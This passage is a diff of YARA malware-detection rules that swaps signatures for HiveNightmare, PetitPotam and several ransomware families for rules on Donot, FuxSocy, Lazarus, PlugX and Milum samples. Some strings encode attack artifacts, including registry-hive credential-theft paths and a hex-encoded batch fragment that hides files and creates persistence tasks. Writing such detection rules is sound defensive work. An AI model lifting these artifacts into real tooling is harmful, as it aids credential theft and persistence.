-		$s5 = { 7d 2c 20 ?? 20 3d 20 ?? 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 2c 20 31 20 2b 20 ?? 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 20 2b 20 ?? 20 2b 20 34 29 2c 20 ?? 20 3d 20 5b 5d 2c }
-		$s6 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 41 44 4f 44 42 2e 53 74 72 65 61 6d 22 29 3b }
-		$s7 = { 5b ?? 5d 20 3d 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 54 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 3b }
+		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
+		$s1 = { 78 9c ec bd 6b 97 eb 4a 72 25 f6 57 8e b5 96 67 75 4f 6b 24 f0 25 8f a6 d5 b3 16 59 00 6a c8 19 80 06 86 28 9b 65 d9 b3 7a 58 b7 59 97 3c ea 96 fb 21 92 90 fb bf 3b 76 64 c6 23 93 f5 38 47 6a 8f f5 41 1f ee ba c5 03 12 40 66 46 46 c6 63 c7 8e 7f f8 }
+		$s2 = { 94 fe 9b f1 c7 1f e8 e3 0f f4 f1 87 19 fd 37 ff f9 17 fc db 8f f4 ed e2 e7 5f fe 1b fe ff df 7e fc 8b df fe f0 f7 5f 7f 79 f8 e1 27 7f f9 7f fc 5f cb 7f f7 fc cb 7f 37 16 ff ee af ff f6 67 7f fb 97 7f fb b7 bf f8 3f ff f2 f8 e7 74 e3 9f fe fc cb e5 f5 c7 af 3f 7c f9 c9 8f 5f fe 06 3f f9 fa c3 af 8f bf 7f a5 87 d3 fd e9 26 bf 7f fd f1 }
+		$s3 = { b6 7c 2a db e2 39 ae 67 75 d9 ee 56 ab 7e 27 f2 b5 2e ba 61 3d a5 f5 88 f3 5b 3f f6 b4 b6 6d d1 c9 fb ae 9a 20 93 63 5c cf 69 73 6e a6 dd 4e d6 6b 98 f4 67 92 01 fa 9e 3d 6f 98 f7 95 3c ef eb aa 3f 37 85 bd ef 70 69 c6 ba ea 77 4f }
+		$s4 = { 4d 51 d7 5b 7d de f2 96 c8 0b dd bf d9 2d e9 7d 87 85 ec 87 b6 a4 cf 43 dc 1f 55 37 d2 fd 2b 95 df 20 6f 45 ab e3 e1 eb 24 df 71 ff 40 fe 69 3f }
+		$s5 = { 0f 35 fc 43 53 cf 03 67 d3 85 fb 51 b6 49 5f 40 fa 5d a2 3f 7d 31 fb 0b 3d 6f 53 69 ff 78 aa 37 e8 f3 12 fe 35 3e 43 90 7c 9c e3 73 a6 78 1c 9c 21 ec bf 20 df eb f0 5a b7 76 6f fb ad 96 53 57 0f a4 fc c3 6a f5 6d fe 41 fc 19 ed f7 4f 78 3a e9 1f f8 23 3d 2b 8d 2f 86 79 d6 7b b2 f8 e0 85 f2 51 25 fc 70 8c }
 
 	condition:
-		filesize > 8KB and 6 of ( $s* )
+		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_Exp_CVE_2021_36934_July_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Donot_Downloader_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect CVE_2021_36934 exploit (HiveNightmare)"
+		description = "Detect the trojan downloader used by Donot group"
 		author = "Arkbird_SOLG"
-		id = "3a0ed4f7-8a99-569f-a636-4cd64c2121bb"
-		date = "2021-07-23"
-		modified = "2021-07-23"
-		reference = "https://github.com/GossiTheDog/HiveNightmare"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/HiveNightmare/Exp_CVE_2021_36934_July_2021_1.yara#L1-L23"
+		id = "251a809e-9e36-5c46-955f-006531bd9619"
+		date = "2020-05-09"
+		modified = "2021-05-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/Donot/APT_Donot_Downloader_May_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "2fd6cdf8a81f239473716d2c10a1754ebb2c60099eebd9d0cc1450ad3441075b"
+		logic_hash = "df64ab97b74935ce8b73c3854eb81fa1dbd4e59b1e27c43ae9c85b90aaaef6f7"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		hash1 = "0009d4950559b508353b951a314c5ac0aaae8161751017d3d4681dc805374eaa"
-		hash2 = "7baab69f86b50199456c9208624dd16aeb0d18d8a6f2010ee6501a183476f12f"
-		hash3 = "9035f88894a937892c63ac9a3c6c16301c7ecea7c11cf31d0fd24c39f17c8c2f"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "28aa296bda12f0184564c5f6b46e679f07255aa8df58b861ea17910cdcaa674a"
+		hash2 = "03730cdc23a3d10c8752ad1464ff2e68a64c69f8310b0ceea4d52b1db0215dfc"
+		hash3 = "edd590c343570f7576aca83da58967e058585c6ba861682dca2fc987c713ee3a"
+		tlp = "White"
+		adversary = "Donot"
 
 	strings:
-		$s1 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" fullword wide
-		$s2 = "Windows\\System32\\config\\SECURITY" fullword wide
-		$s3 = "Windows\\System32\\config\\SYSTEM" fullword wide
-		$s4 = "Windows\\System32\\config\\SAM" fullword wide
-		$s5 = "SECURITY-" fullword wide
-		$s6 = { 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 53 45 43 55 52 49 54 59 20 3a  }
-		$s7 = { 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d }
+		$seq1 = { 65 63 68 6f 20 6f 66 66 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 64 65 6c 20 2f 66 20 25 73 20 0a 20 53 45 54 20 2f 41 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 20 0a 20 53 45 54 20 2f 41 20 52 41 4e 44 3d 25 25 52 41 4e 44 4f 4d 25 25 20 31 30 30 30 30 20 2b 20 32 20 0a 20 65 63 68 6f 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 2d 25 25 52 41 4e 44 25 25 20 3e 3e 20 25 73 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 6f 62 55 70 64 61 74 65 20 2f 66 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 32 30 20 2f 66 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 74 72 20 25 73 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 31 30 20 2f 66 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 74 72 20 25 73 20 0a 20 6d 6f 76 65 20 25 25 41 50 50 44 41 54 41 25 }
+		$seq2 = { c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 c7 04 24 ?? 42 [2] e8 ?? 01 00 00 83 ec 14 [0-3] c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 [2-5] 24 04 [0-3] 89 04 24 e8 ?? 01 00 00 83 ec 18 89 [1-9] c7 44 24 04 ?? 43 [2] c7 04 24 ?? 61 [2] e8 ?? 08 00 00 }
+		$s1 = "VirtualQuery failed for %d bytes at address %p" fullword ascii
+		$s2 = { 25 73 5c [1-14] 2e 62 61 74 }
+		$s3 = { 25 73 5c [1-14] 25 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 50KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $seq* ) and 2 of ( $s* )
 }
-rule ARKBIRD_SOLG_Exp_Petitpotam_July_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Fuxsocy_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect PetitPotam exploit (local exploit version)"
+		description = "Detect FuxSocy ransomware"
 		author = "Arkbird_SOLG"
-		id = "dd23c77d-9929-5130-aad8-2bcc0a7dcbaa"
-		date = "2021-07-23"
-		modified = "2021-07-24"
-		reference = "https://github.com/topotam/PetitPotam"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/PetitPotam/Exp_PetitPotam_July_2021_1.yara#L1-L24"
+		id = "2420c2fa-bc94-51a6-87ab-4e8d226fdd23"
+		date = "2020-05-09"
+		modified = "2021-05-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/FuxSocy/RAN_FuxSocy_May_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "a33a1dc2a3593063de2b65e01a770ff5c72ad360d88efdca588eacb8817fb91d"
+		logic_hash = "ab34f95d2b12bdf2d362538e880301542c3308fff427cfb5ee59e9dca89ec033"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
-		hash1 = "10cbadc2c82178d3b7bdf96ab39b9e8580ee92c2038728b74d314e506c7a9144"
-		tlp = "white"
+		hash1 = "d786355c1b3dc741103873aed46d8ffa3430d113a27482f37f3ffc7c978747f6"
+		hash2 = "43bbfb3389deb3846bba19a8ab2e9c8fd9b581720962b8170d4a63ad816b5804"
+		tlp = "White"
 		adversary = "-"
 
 	strings:
-		$s1 = "\\pipe\\lsarpc" fullword wide
-		$s2 = { 5c 00 5c 00 25 00 73 00 5c 00 [4-12] 5c 00 [4-12] 00 2e 00 65 00 78 00 65 }
-		$s3 = { 5c 00 5c 00 25 00 73 00 00 00 00 00 6e 00 63 00 61 00 63 00 6e 00 5f 00 6e 00 70 }
-		$s4 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a }
-		$s5 = { 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 20 61 74 20 66 69 6c 65 20 25 68 73 20 6c 69 6e 65 20 25 64 }
-		$s6 = { 50 e8 06 95 ff ff 83 c4 10 c7 85 00 ff ff ff 00 00 00 00 8b 85 00 ff ff ff 50 8d 8d 0c ff ff ff 51 8d 55 dc 52 8b 45 f4 50 e8 4e 7a ff ff 83 c4 10 89 45 e8 83 7d }
-		$s7 = "Attack success!!!\n" fullword wide
-		$s8 = { 8b 43 0c 56 83 e8 24 8d 73 20 50 56 8d 45 b4 50 8d 45 e8 50 e8 02 02 00 00 68 b8 52 4f 00 8d 45 b4 50 68 bc 52 4f 00 8d 45 e8 50 8b 43 0c 68 c0 52 4f 00 ff 75 10 83 e8 24 68 cc 52 4f 00 50 68 00 53 4f 00 56 68 0c 53 4f 00 68 20 53 4f 00 68 78 53 4f 00 8d 85 c0 fe ff ff 68 f4 00 00 00 50 e8 4e 91 ff ff 83 c4 4c 8d 85 c0 fe ff ff 50 6a 04 }
-		$s9 = { 25 73 25 73 25 70 25 73 25 7a 64 25 73 25 64 25 73 25 73 25 73 25 73 25 73 }
-		$s10 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 00 20 00 3a 00 20 00 25 00 6c 00 73 }
+		$seq1 = { b8 48 14 00 00 e8 b8 83 00 00 53 55 56 8d 44 24 48 8b e9 50 55 89 54 24 14 33 f6 ff 15 84 02 41 00 8b d8 85 db 0f 84 fa 00 00 00 57 8b cb e8 2b 09 00 00 8b f8 85 ff 0f 84 e7 00 00 00 57 53 56 55 ff 15 8c 02 41 00 8b 1d 78 02 41 00 8d 44 24 18 50 8d 44 24 18 50 68 cc 14 48 00 57 89 74 24 24 89 74 24 28 ff d3 83 7c 24 18 04 0f 82 ab 00 00 00 8b 44 24 10 8b 4c 24 14 c7 44 24 1c 00 15 48 00 c7 44 24 20 14 15 48 00 c7 44 24 24 30 15 48 00 c7 44 24 28 48 15 48 00 c7 44 24 2c 60 15 48 00 c7 44 24 30 80 15 48 00 c7 44 24 34 a0 15 48 00 c7 44 24 38 c0 15 48 00 c7 44 24 3c e0 15 48 00 c7 44 24 40 fc 15 48 00 c7 44 24 44 14 16 48 00 c7 44 24 48 38 16 48 00 ff 74 84 1c 0f b7 41 02 50 0f b7 01 50 8d 44 24 60 68 54 16 48 00 50 ff 15 64 02 41 00 83 c4 14 8d 44 24 50 50 8d 44 24 14 50 8d 44 24 5c 50 57 ff d3 85 c0 74 0d 8b 4c 24 10 33 d2 e8 47 0a 00 00 8b f0 8b cf e8 c9 08 00 00 5f 8b c6 5e 5d 5b 81 c4 48 14 00 00 }
+		$seq2 = { 8d 44 24 50 50 8d 44 24 4c 50 8d 44 24 2c 50 55 ff 15 ec 00 41 00 8b 44 24 14 8b 74 24 18 ff 74 24 68 88 87 57 01 08 00 66 a1 80 4d 41 00 [10] 88 9f 54 01 08 00 c6 87 63 01 08 00 10 89 b7 58 01 08 00 66 89 87 5d 01 08 00 ff 15 6c 00 41 00 0f b6 97 63 01 08 00 03 c0 66 89 87 55 01 08 00 8b 44 24 20 8d 8f 64 01 08 00 88 87 5c 01 08 00 e8 14 2b 00 00 8b 44 24 14 0f b6 c8 0f b7 87 55 01 08 00 83 c1 03 8d 0c c8 89 8f 4c 01 08 00 e8 2e 3a 00 00 8b c8 89 8f 48 01 08 00 85 c9 0f 84 0f 01 00 00 8b 44 24 28 89 41 04 8b 8f 48 01 08 00 8b 44 24 24 89 01 8b 8f 48 01 08 00 8b 44 24 4c 89 41 0c 8b 8f 48 01 08 00 8b 44 24 48 89 41 08 8b 8f 48 01 08 00 8b 44 24 54 89 41 14 8b 8f 48 01 08 00 8b 44 24 50 89 41 10 0f b7 87 55 01 08 00 50 8b 87 48 01 08 00 ff 74 24 6c 83 c0 18 50 e8 b4 b5 00 00 8b 4c 24 6c 33 d2 e8 bd 3b 00 00 8b 4c 24 70 33 d2 89 47 08 e8 af 3b 00 00 0f b6 97 63 01 08 00 89 47 0c 8b 44 24 78 89 87 28 02 08 00 8b 44 24 44 89 47 04 8d 87 44 00 08 00 50 8d 8f 64 01 08 00 89 2f e8 4d 24 00 00 89 b7 18 02 08 00 8b 87 c5 01 08 00 f7 a7 58 01 08 00 8b c8 0f b6 87 5c 01 08 00 8b f2 99 83 c4 10 ff b7 28 02 08 00 03 c8 13 f2 03 0d 80 4d 41 00 13 35 84 4d 41 00 89 8f 1c 02 08 00 89 b7 20 02 08 00 ff 15 c4 00 41 00 53 57 ff 74 24 44 55 ff 15 e8 00 41 00 }
+		$seq3 = { 57 68 ff 01 0f 00 ff 75 08 8b fa 51 32 db ff 15 0c 00 41 00 8b f0 85 f6 74 76 32 ff eb 52 84 ff 75 65 33 c0 50 50 50 50 50 50 50 6a ff 6a 04 6a ff 56 ff 15 10 00 41 00 8b 45 c0 83 f8 01 74 2c 76 2e 83 f8 03 76 1a 83 f8 04 75 24 8d 45 e0 50 6a 01 56 ff 15 18 00 41 00 }
+		$seq4 = { 6a ff 8d 45 fc 50 8d 45 08 50 8d 45 f8 50 ff 33 33 ff 89 7d f8 89 7d 08 89 7d fc ff 15 c8 00 41 00 85 c0 8b 45 08 0f 95 c1 85 c0 74 59 56 }
+		$seq5 = { 8b 45 08 56 ff 70 08 ff 15 dc 00 41 00 8b ce e8 af 2e 00 00 33 ff 57 ff 75 08 57 ff 33 ff 15 e4 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 50KB and 7 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_RAN_Avoslocker_July_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Lazarus_HTA_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect AvosLocker ransomware"
+		description = "Detect HTA with the fake picture header as decoy used by Lazarus"
 		author = "Arkbird_SOLG"
-		id = "3fbc707f-9802-54bc-933b-bc4c4953b1d0"
-		date = "2021-07-23"
-		modified = "2021-07-24"
-		reference = "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/AvosLocker/RAN_AvosLocker_July_2021_1.yara#L1-L23"
+		id = "1a57251e-f0fb-541c-bf8b-f1afecf7f1c7"
+		date = "2021-04-27"
+		modified = "2021-04-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-27/Lazarus/APT_Lazarus_HTA_Apr_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "e2291f574b5ab68e901a76b6511e0ee4c1eee51d5e3eced62bf68ceedb061958"
+		logic_hash = "40c2e5b662d1999c3ae5be97604bb9ebc809a383d66331cb4b385666ce55be2a"
 		score = 75
-		quality = 75
+		quality = 63
 		tags = "FILE"
-		hash1 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
-		hash2 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
+		hash1 = "888cfc87b44024c48eed794cc9d6dea9f6ae0cc3468dee940495e839a12ee0db"
 		tlp = "white"
-		adversary = "-"
+		adversary = "Lazarus"
 
 	strings:
-		$s1 = { 64 72 69 76 65 20 25 73 20 74 6f 6f 6b 20 25 66 20 73 65 63 6f 6e 64 73 0a 00 00 00 25 63 3a 00 64 72 69 76 65 3a 20 25 73 }
-		$s2 = { 63 6c 69 65 6e 74 5f 72 73 61 5f 70 72 69 76 3a 20 25 73 0a }
-		$s3 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d }
-		$s4 = { ff 35 b8 2c 46 00 88 9d 7c ef ff ff e8 3c 56 02 00 50 8d 85 71 ef ff ff 50 e8 c5 9e ff ff 83 c4 0c 8d 85 94 ef ff ff 50 53 53 68 14 01 00 00 ff 35 b8 2c 46 00 ff b5 90 ef ff ff ff 15 00 a0 44 00 85 c0 0f 85 cd 00 00 00 8b 35 48 a0 44 00 8d 85 98 fe ff ff 53 68 ff 00 00 00 50 68 00 04 00 00 ff d6 50 53 68 00 10 00 00 ff 15 44 a0 44 00 b1 3e c7 85 70 ef ff ff 3e 7b 6c 6c c7 85 74 ef ff ff 71 6c 04 1e 8b c3 c7 85 78 ef ff ff 1b 4d 34 00 30 8c 05 71 ef ff ff 40 83 f8 0a 73 08 8a 8d 70 ef ff ff eb eb 8d 85 98 fe ff ff 88 9d 7b ef ff ff 50 8d 85 71 ef ff ff 50 e8 23 9e ff ff 0f 28 05 00 8b 45 00 59 0f 11 85 48 ef ff ff 59 0f 28 05 40 8b 45 00 8b cb 0f 11 85 58 ef ff ff 66 c7 }
-		$s5 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 a6 ca ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 48 a1 44 00 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b }
-		$s6 = { 4d 61 70 3a 20 25 73 0a 00 00 00 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6e 00 67 00 20 00 25 00 6c 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 }
-		$s7 = { 44 6f 6e 65 21 21 0a 00 25 66 20 73 65 63 6f 6e 64 73 0a }
-		$s8 = { 56 68 01 00 00 08 6a 01 52 ff 15 14 a0 44 00 85 c0 0f 84 97 00 00 00 8d 45 f8 50 53 53 6a 06 53 ff 36 8b 1d 20 a0 44 00 ff d3 85 c0 74 73 ff 75 f8 e8 3b a7 01 00 a3 b8 2c 46 00 59 85 c0 }
+		$s1 = { 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e }
+		$s2 = { 5b 27 4f 70 65 6e 54 65 78 74 46 69 6c 65 27 2c 27 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 27 }
+		$s3 = { 5b 27 70 75 73 68 27 5d }
+		$s4 = { 28 27 4d 5a 27 29 2c 65 5b 27 43 6c 6f 73 65 27 5d 28 29 }
+		$s5 = { 5b 27 73 68 69 66 74 27 5d 28 29 }
+		$s6 = { 3b 76 61 72 20 64 61 74 61 3d 5b }
+		$s7 = { 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 50KB and 6 of ( $s* )
+		( uint16( 0 ) == 0x4d42 or uint16( 0 ) == 0xd8ff or uint32( 0 ) == 0x474e5089 or uint32( 0 ) == 0x38464947 ) and filesize > 20KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Mount_Locker_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_Mal_Plugx_Thor_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect Mount Locker ransomware (November 2020 variant)"
+		description = "Detect Thor variant of PlugX (Variant 1)"
 		author = "Arkbird_SOLG"
-		id = "20fde6f4-ef7d-57c4-8cc2-a6ea810c2b0c"
-		date = "2020-11-20"
-		modified = "2020-11-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Mount Locker/Ran_Mount_Locker_Nov_2020_1.yar#L1-L26"
+		id = "5447e5df-0326-5987-905b-bfc49acee05a"
+		date = "2021-07-27"
+		modified = "2021-07-28"
+		reference = "https://unit42.paloaltonetworks.com/thor-plugx-variant/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-27/PlugX/Mal_PlugX_Thor_July_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "028e89e9c0c46ac5c36fee5cbfba068b4c6c1f53aa224e454ebd358f2c6ae9a9"
+		logic_hash = "f94e6cf8a1169526a438dfbf4d6b40f4ce0f6af6eee2e893fb138b81c4172c73"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037"
-		hash2 = "226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2"
+		hash1 = "125fdf108dc1ad6f572cbdde74b0c7fa938a9adce0cc80cb5ce00f1c030b0c93"
+		hash2 = "690c488a9902978f2ef05aa23d21f4fa30a52dd9d11191f9b49667cd08618d87"
+		hash3 = "3c5e2a4afe58634f45c48f4e800dc56bae3907dde308ff97740e9cd5684d1c53"
+		hash4 = "a9cbce007a7467ba1394eed32b9c1774ad09a9a9fb74eb2ccc584749273fac01"
+		tlp = "white"
+		adversary = "Chinese APT group"
 
 	strings:
-		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword wide
-		$s2 = "VBA6.DLL" fullword ascii
-		$s3 = "MSComDlg.CommonDialog" fullword ascii
-		$s4 = "DllFunctionCall" fullword ascii
-		$s5 = { 00 2a 00 5c 00 41 00 43 00 3a 00 5c [35-160] 00 2e 00 76 00 62 00 70 }
-		$s6 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\COMCTL32.oca" fullword wide
-		$s7 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\MSFLXGRD.oca" fullword ascii
-		$s8 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
-		$s9 = "SFLXGRD.OCX" fullword ascii
-		$s10 = "COMDLG32.OCX" fullword ascii
-		$s11 = "COMCTL32.OCX" fullword ascii
-		$seq1 = { 42 00 24 00 40 00 43 00 67 00 2f 00 44 00 08 00 4a 00 51 00 77 00 54 00 76 00 25 00 55 00 48 00 00 00 00 00 5d 00 4c 00 09 00 53 00 3e 00 73 00 62 00 52 00 50 00 0b 00 61 00 01 00 61 01 3a 00 03 00 57 00 4f 00 75 00 54 00 71 00 22 00 53 00 37 00 00 00 30 00 1d 00 46 00 5a 00 5c 00 48 00 78 00 63 00 02 00 1d 00 23 00 3b 00 28 00 55 00 73 00 28 00 61 00 3b 00 00 00 00 00 44 00 4e 00 4a 00 4d 00 61 00 40 00 59 00 2b 00 38 00 02 01 04 01 54 00 08 00 52 00 56 00 1d 00 42 00 3e 00 00 00 00 00 35 00 70 00 3b 00 37 00 6f 00 26 00 26 00 40 00 64 00 02 00 51 00 3c 00 41 00 16 00 3e 00 00 00 47 00 58 00 33 00 89 00 54 00 2d 00 29 00 50 00 04 00 59 00 5d 00 4f 00 1b 00 36 00 30 00 83 00 41 00 00 00 2a 00 54 00 47 00 86 00 56 00 19 00 24 00 4e 00 3a 00 45 00 51 00 4d 00 1e 00 3b 00 2b 00 81 00 35 00 00 00 3a 00 65 00 57 00 03 00 2d 00 62 00 53 }
-		$seq2 = { 5a 00 3d 00 14 00 51 00 1f 00 67 00 1c 00 24 00 00 00 00 00 00 00 6f 00 27 00 62 00 5d 00 6d 00 30 00 01 00 27 01 25 00 62 00 7b 00 05 00 56 00 24 00 3c 00 3d 00 5d 00 2e 00 62 00 03 00 0a 00 57 00 6a 00 02 00 5d 00 02 01 23 01 67 00 20 00 54 00 01 00 6c 01 17 00 0b 00 44 00 21 00 1e 00 01 00 52 01 60 00 3b 00 11 00 45 00 2a 00 59 00 2c 00 19 00 00 00 5a 00 1e 00 61 00 5c 00 6b 00 31 00 01 00 1a 01 2d 00 4a 00 6f 00 11 00 57 00 2c 00 3a 00 3a 00 50 00 2a 00 61 00 02 00 07 00 53 00 7b 00 01 01 5b 00 02 01 6a 01 0b 00 03 00 6d 00 43 00 0c 00 64 00 4d 00 44 00 5f 00 08 00 5a 00 68 00 2b 00 32 00 68 }
+		$s1 = { 55 8b ec 81 ec ?? 01 00 00 a1 00 [2] 10 33 c5 89 45 [2-10] 85 ?? fe ff ff [0-1] c6 85 ?? fe ff ff 5c c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff }
+		$s2 = { 8b ?? ?? fe ff ff c6 ?? 00 [3-5] fe ff ff [4-10] fe ff ff }
+		$s3 = { fe ff ff 6a 40 68 00 10 00 00 8b 95 ?? fe ff ff 52 6a 00 ff 95 ?? fe ff ff 89 85 ?? fe ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* ) and 1 of ( $seq* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Loa_JS_Gootkit_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Milum_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect JS loader used on the Gootkit killchain (November 2020)"
+		description = "Detect Milum malware"
 		author = "Arkbird_SOLG"
-		id = "649133bd-a44c-5d99-befa-0508fed27ed8"
-		date = "2020-11-21"
-		modified = "2020-11-21"
-		reference = "https://twitter.com/ffforward/status/1330214661577437187"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Gootkit/Loa_JS_Gootkit_Nov_2020_1.yar#L1-L16"
+		id = "ba1cc56e-f6da-57db-a773-4823ae343e31"
+		date = "2021-07-08"
+		modified = "2021-07-08"
+		reference = "https://securelist.com/wildpressure-targets-macos/103072/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-08/WildPressure/MAL_Milum_Jul_2021_1.yara#L1-L33"
 		license_url = "N/A"
-		logic_hash = "f24d31e7107b8c59b969481596a5e1369933bf2b0fa5117cd1aa5f7ea116d8d5"
